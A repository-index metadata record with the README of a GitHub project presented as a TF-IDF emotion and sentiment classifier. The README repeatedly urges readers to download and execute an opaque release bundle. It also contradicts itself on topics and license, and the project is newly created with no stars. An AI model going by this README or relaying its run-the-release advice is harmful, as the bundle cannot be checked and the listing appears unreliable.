{"id":30360469,"url":"https://github.com/bakrawy2025/emotion-sentiment-classifier","last_synced_at":"2025-08-19T14:22:48.550Z","repository":{"id":310450642,"uuid":"1039832097","full_name":"Bakrawy2025/emotion-sentiment-classifier","owner":"Bakrawy2025","description":"Emotion \u0026 sentiment classifier in Python using TF-IDF + Logistic Regression (scikit-learn). Includes joblib model saving, evaluation and CLI prediction. 🐱💻","archived":false,"fork":false,"pushed_at":"2025-08-18T06:12:55.000Z","size":1612,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-08-18T08:22:33.837Z","etag":null,"topics":["audio-processing","confusion-matrix","data-science","emotion-detection-emotion-classification","emotion-recognition","interactive-prediction","jupyter-notebook","lstm-sentiment-analysis","machine-learning","naive-bayes-classifier","nltk","recurrent-neural-networks","scikit-learn","social","speech-analysis","tensorflow","text-classification","tweets"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Bakrawy2025.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-08-18T03:47:47.000Z","updated_at":"2025-08-18T06:12:58.000Z","dependencies_parsed_at":"2025-08-18T08:22:55.716Z","dependency_job_id":"6a9ebbae-301d-4cbb-a76c-a6eaba569c35","html_url":"https://github.com/Bakrawy2025/emotion-sentiment-classifier","commit_stats":null,"previous_names":["bakrawy2025/emotion-sentiment-classifier"],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/Bakrawy2025/emotion-sentiment-classifier","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Bakrawy2025%2Femotion-sentiment-classifier","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Bakrawy2025%2Femotion-sentiment-classifier/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Bakrawy2025%2Femotion-sentiment-classifier/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Bakrawy2025%2Femotion-sentiment-classifier/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Bakrawy2025","download_url":"https://codeload.github.com/Bakrawy2025/emotion-sentiment-classifier/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Bakrawy2025%2Femotion-sentiment-classifier/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271166835,"owners_count":24710579,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["audio-processing","confusion-matrix","data-science","emotion-detection-emotion-classification","emotion-recognition","interactive-prediction","jupyter-notebook","lstm-sentiment-analysis","machine-learning","naive-bayes-classifier","nltk","recurrent-neural-networks","scikit-learn","social","speech-analysis","tensorflow","text-classification","tweets"],"created_at":"2025-08-19T14:22:47.076Z","updated_at":"2025-08-19T14:22:48.532Z","avatar_url":"https://github.com/Bakrawy2025.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Emotion Sentiment Classifier — Detect Emotions in Text Fast\n\n[![Releases](https://img.shields.io/badge/releases-download-blue.svg)](https://github.com/Bakrawy2025/emotion-sentiment-classifier/releases)\n\n![Hero Image](https://images.unsplash.com/photo-1531297484001-80022131f5a1?ixlib=rb-4.0.3\u0026q=80\u0026fm=jpg\u0026crop=entropy\u0026cs=tinysrgb\u0026dl=rawpixel-740015-unsplash.jpg)\n\nTable of contents\n- About 📘\n- Features ✨\n- Demo 🎯\n- Quick start ▶️\n- Installation — download and execute release file 🗂️\n- Usage — CLI and interactive prediction 🛠️\n- Data pipeline and model details ⚙️\n- Evaluation and metrics 📊\n- Examples — input / output pairs 🧾\n- API and integration 🔗\n- Contributing 🤝\n- License \u0026 credits ©\n\nAbout 📘\nUnderstanding human emotions in text helps many tasks: customer feedback analysis, chat moderation, market research, and UX design. This repository provides a working pipeline for emotion detection and sentiment classification. It uses TF-IDF vectorization and a logistic regression core implemented with scikit-learn. The project outputs probabilistic emotion labels and a compact confusion-matrix-based report for model evaluation.\n\nFeatures ✨\n- Text classification for multiple emotions (joy, sadness, anger, fear, surprise, disgust) and binary sentiment (positive/negative).\n- TF-IDF vectorization tuned for short text and reviews.\n- Logistic regression classifier with hyperparameter presets and cross-validation.\n- Data cleaning and basic NLP preprocessing: tokenization, stopword removal, simple lemmatization.\n- Balanced class handling and weighted metrics.\n- Interactive prediction script for quick local checks.\n- Evaluation tools: confusion matrix, precision/recall, F1, ROC curves for sentiment class.\n- Exportable model artifacts and pipeline via Releases.\n\nDemo 🎯\nLive demo assets appear in releases. The release bundle contains:\n- Trained model pickle files\n- Vectorizer and preprocessing pipeline\n- CLI scripts for batch prediction\n- Small web demo (Flask) for local testing\n\nDownload and run the release bundle from:\nhttps://github.com/Bakrawy2025/emotion-sentiment-classifier/releases\nThe release file needs to be downloaded and executed following the Installation section below.\n\nQuick start ▶️\n1. Visit the releases page and download the latest asset:\n   https://github.com/Bakrawy2025/emotion-sentiment-classifier/releases\n2. Extract the package and run the interactive predictor or the web demo.\n3. Feed text and get emotion and sentiment labels with probability scores.\n\nInstallation — download and execute release file 🗂️\nThe repository provides release archives with executable scripts and trained models. Pick the latest release and follow these steps.\n\nUnix / macOS\n1. Download the archive (replace FILE_NAME with the actual asset name from releases):\n   ```\n   curl -L -o emotion_release.zip \"https://github.com/Bakrawy2025/emotion-sentiment-classifier/releases/download/vX.Y/emotion_release.zip\"\n   ```\n2. Unzip and enter the folder:\n   ```\n   unzip emotion_release.zip\n   cd emotion-sentiment-classifier\n   ```\n3. Create a virtual environment and install dependencies:\n   ```\n   python3 -m venv venv\n   source venv/bin/activate\n   pip install -r requirements.txt\n   ```\n4. Run the interactive CLI predictor:\n   ```\n   python3 scripts/predict_cli.py\n   ```\n5. Or run the local Flask demo:\n   ```\n   python3 web/app.py\n   # open http://127.0.0.1:5000 in your browser\n   ```\n\nWindows (PowerShell)\n1. Download the asset from the releases page.\n2. Extract, create a virtual environment and install:\n   ```\n   python -m venv venv\n   .\\venv\\Scripts\\activate\n   pip install -r requirements.txt\n   ```\n3. Run the CLI:\n   ```\n   python scripts\\predict_cli.py\n   ```\n\nIf the release link ever fails, check the Releases section on the repository page.\n\nUsage — CLI and interactive prediction 🛠️\nCLI usage (batch)\n- Predict labels for a CSV file with a text column named \"text\":\n  ```\n  python scripts/predict_batch.py --input data/reviews.csv --text-col text --output predictions.csv\n  ```\n- Options:\n  - --model: path to model pickle\n  - --vectorizer: path to TF-IDF vectorizer\n  - --threshold: probability cutoff for label assignment\n\nInteractive CLI\n- The interactive script opens a prompt. Type a sentence and get labels and confidences.\n  ```\n  $ python scripts/predict_cli.py\n  \u003e I'm so happy with the service!\n  Emotion: joy (0.92)\n  Sentiment: positive (0.98)\n  ```\n\nLocal web demo (Flask)\n- The demo offers an input box and a probability bar chart for emotion scores.\n- Run web/app.py and use the local URL shown in the console.\n\nData pipeline and model details ⚙️\nPreprocessing pipeline\n- Lowercase normalization\n- Unicode cleanup\n- URL and mention removal\n- Tokenization with regex\n- Stopword removal (NLTK stopword list)\n- Optional simple lemmatization (WordNet)\n\nFeature engineering\n- TF-IDF vectorization on unigrams and bigrams\n- Max features configurable (default 30k)\n- Min and max document frequency thresholds to reduce noise\n\nModel\n- Core classifier: scikit-learn LogisticRegression (solver: lbfgs)\n- Multi-class handled with multinomial option\n- Class weights set to balanced by default\n- Pipeline stores vectorizer and classifier together for predict_proba and transform\n\nTraining pipeline\n- Train/test split with stratification\n- Hyperparameter grid search around C (regularization) and ngram range\n- Cross-validation with 5 folds\n- Early export of best model for inference\n\nEvaluation and metrics 📊\nThe repo includes scripts to generate the following:\n- Confusion matrix and heatmap\n- Accuracy, macro F1, macro precision, macro recall\n- Per-class support and weighted metrics\n- ROC-AUC for binary sentiment\n- Calibration plots for model probability checks\n\nSample evaluation command:\n```\npython scripts/evaluate.py --pred predictions.csv --true labels.csv --output eval_report/\n```\n\nVisualizations\n- Confusion matrix plot using seaborn\n- Class probability distribution plots\n- Precision-recall curves for hard-to-detect emotions\n\nExamples — input / output pairs 🧾\nSmall example inputs and expected outputs:\n\nInput: \"I can't believe this happened. I'm furious.\"\nOutput:\n- Emotion: anger (0.94)\n- Sentiment: negative (0.89)\n\nInput: \"What a pleasant surprise. That made my day!\"\nOutput:\n- Emotion: joy (0.87), surprise (0.58)\n- Sentiment: positive (0.95)\n\nInput: \"The product broke after one day. Very disappointed.\"\nOutput:\n- Emotion: sadness (0.72), disgust (0.48)\n- Sentiment: negative (0.93)\n\nThese pairs mirror real use cases in feedback and social monitoring. The model returns multiple emotion probabilities so downstream logic can combine or threshold labels.\n\nAPI and integration 🔗\nThe package includes a small Flask app and a REST API for quick integration:\n- POST /predict\n  - payload: { \"text\": \"...\" }\n  - response: { \"emotions\": { \"joy\": 0.7, ... }, \"sentiment\": { \"positive\": 0.8, \"negative\": 0.2 } }\n\nExample curl:\n```\ncurl -X POST -H \"Content-Type: application/json\" \\\n  -d '{\"text\":\"I love this product!\"}' \\\n  http://127.0.0.1:5000/predict\n```\n\nDeployment hints\n- Serve the model behind a light WSGI server (gunicorn)\n- Use batching for high throughput\n- Persist vectorizer and model artifacts to the same storage used during training\n\nModel export\n- The Releases archive includes pickled artifacts:\n  - pipeline.pkl (vectorizer + classifier)\n  - labels.json (mapping)\n  - requirements.txt\n\nContributing 🤝\n- Fork the repository and open a PR with a clear description of changes.\n- Add tests for data cleaning, vectorizer outputs, and predict endpoint.\n- Keep changes unitary and document new functionality in README and code.\n- Use the same style for scripts and follow the existing import patterns.\n\nRepository topics and tags\nThis project matches topics:\nartificial-intelligence, confusion-matrix, data-cleaning, data-science, data-visualization, emotion-detection, interactive-prediction, logistic-regression, machine-learning, model-evaluation, natural-language-processing, python, scikit-learn, sentiment-analysis, text-classification, tf-idf-vectorization\n\nThese tags help search and surface the repo for related projects and users.\n\nAssets and releases\nFind downloadable release bundles here:\n[![Download Releases](https://img.shields.io/badge/Get%20Releases-%20Download%20Now-blue.svg)](https://github.com/Bakrawy2025/emotion-sentiment-classifier/releases)\n\nThe release file includes a runnable demo script. Download that file and execute it per the Installation section instructions. If the link fails, check the repository Releases section for alternate assets.\n\nFiles of interest\n- scripts/predict_cli.py — interactive CLI\n- scripts/predict_batch.py — CSV batch processing\n- scripts/train.py — training and export\n- scripts/evaluate.py — metrics and plots\n- web/app.py — small Flask demo\n- requirements.txt — dependency pin list\n\nLicense \u0026 credits ©\n- License: MIT\n- Main implementation: Python, scikit-learn, pandas, numpy, seaborn, Flask\n- Data sources: mix of synthetic and public sentiment datasets for examples and small demos\n\nContact\n- Repo and releases: https://github.com/Bakrawy2025/emotion-sentiment-classifier/releases\n- Open an issue for help, feature requests, or bugs.\n\nScreenshots and visuals\n![Confusion Matrix Example](https://upload.wikimedia.org/wikipedia/commons/2/2c/Confusion_matrix.svg)\n\n![TF-IDF illustration](https://miro.medium.com/max/1400/1*0H6G5o6VnBLX6q4ts4Y53w.png)\n\nMaintenance checklist\n- Keep dependencies updated and test for breaking changes.\n- Re-train models when new labeled data arrives.\n- Monitor per-class performance to detect drift.\n\nThis document contains core usage, install steps, API details, and pointers to the distribution assets. Follow the Releases link to download and execute the packaged bundle for local testing and rapid integration.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbakrawy2025%2Femotion-sentiment-classifier","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbakrawy2025%2Femotion-sentiment-classifier","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbakrawy2025%2Femotion-sentiment-classifier/lists"}